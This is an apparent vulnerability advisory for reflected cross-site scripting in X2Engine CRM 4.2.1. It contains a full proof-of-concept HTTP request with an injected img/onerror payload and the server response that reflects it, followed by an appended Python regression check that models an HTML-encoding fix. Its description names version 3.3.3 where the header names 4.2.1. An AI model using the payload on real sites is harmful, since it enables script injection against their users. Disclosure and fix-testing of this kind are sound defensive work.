X2Engine CRM 4.2.1 Cross Site Scripting

2014.09.25
Credit: JoeV
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

#Affected Vendor: http://www.x2engine.com/
#Date: 24/09/2014
#Discovered by: JoeV
#Type of vulnerability: XSS
#Tested on: Windows 7
#Version : 4.2.1
#Description: X2Engine CRM v 3.3.3 is susceptible to a Cross Site Scripting attack.

Proof of Concept (PoC):
---------------------------

POST /index-test.php/site/motd HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Content-Length: 63
Accept: */*
Origin: http://localhost
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://localhost/index-test.php/profile/1
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Cookie: iconSize=16x16; hudson_auto_refresh=true; /modules/system/admin.php_SystemAutotasks_sortsel=sat_name; /modules/system/admin.php_SystemAutotasks_ordersel=ASC; /modules/system/admin.php_limitsel=15; /modules/system/admin.php_SystemAutotasks_filtersel=default; cookies_on=1; __atuvc=2%7C39; PHPSESSID=6mefdfmcnj13282kb7anr4obe2

message=%22%3E%3Cimg+src%3Dd+onerror%3Dconfirm(%2Fxss%2F)%3B%3E

HTTP/1.1 200 OK
Date: Wed, 24 Sep 2014 14:00:57 GMT
Server: Apache/2.4.9 (Win32) PHP/5.5.12
X-Powered-By: PHP/5.5.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 37
Content-Type: text/html

"><img src=d onerror=confirm(/xss/);>

--
Regards,
*Joel V*
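The exchange above can be used as a regression check for the fix. The following Python is an added example, not part of the original advisory or of X2Engine's code: the function names are assumptions, and `encoded_echo` models an HTML-encoding fix rather than the vendor's actual patch.

```python
from html import escape
from urllib.parse import parse_qsl

# Characters that change HTML parsing context when echoed unencoded.
HTML_META = set("<>\"'")

# Request and response bodies copied from the PoC in this advisory.
POC_REQUEST_BODY = "message=%22%3E%3Cimg+src%3Dd+onerror%3Dconfirm(%2Fxss%2F)%3B%3E"
POC_RESPONSE_BODY = '"><img src=d onerror=confirm(/xss/);>'


def unescaped_reflections(request_body, response_body, content_type="text/html"):
    """Return the form parameters whose decoded value contains HTML
    metacharacters and appears verbatim in an HTML response body."""
    if not content_type.lower().startswith("text/html"):
        return []  # the browser will not parse the body as markup
    hits = []
    for name, value in parse_qsl(request_body, keep_blank_values=True):
        if HTML_META & set(value) and value in response_body:
            hits.append(name)
    return hits


def encoded_echo(request_body, param):
    """Model of the endpoint after a fix (assumption): the parameter is
    HTML-encoded, quotes included, before it is written to the response."""
    params = dict(parse_qsl(request_body, keep_blank_values=True))
    return escape(params.get(param, ""), quote=True)


if __name__ == "__main__":
    print("vulnerable response reflects:",
          unescaped_reflections(POC_REQUEST_BODY, POC_RESPONSE_BODY))
    fixed = encoded_echo(POC_REQUEST_BODY, "message")
    print("encoded response body:", fixed)
    print("encoded response reflects:",
          unescaped_reflections(POC_REQUEST_BODY, fixed))
```

Run against a patched instance, the check should report no reflected parameters for `/site/motd`; serving the response with a non-HTML `Content-Type` is a further mitigation the check also recognises.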

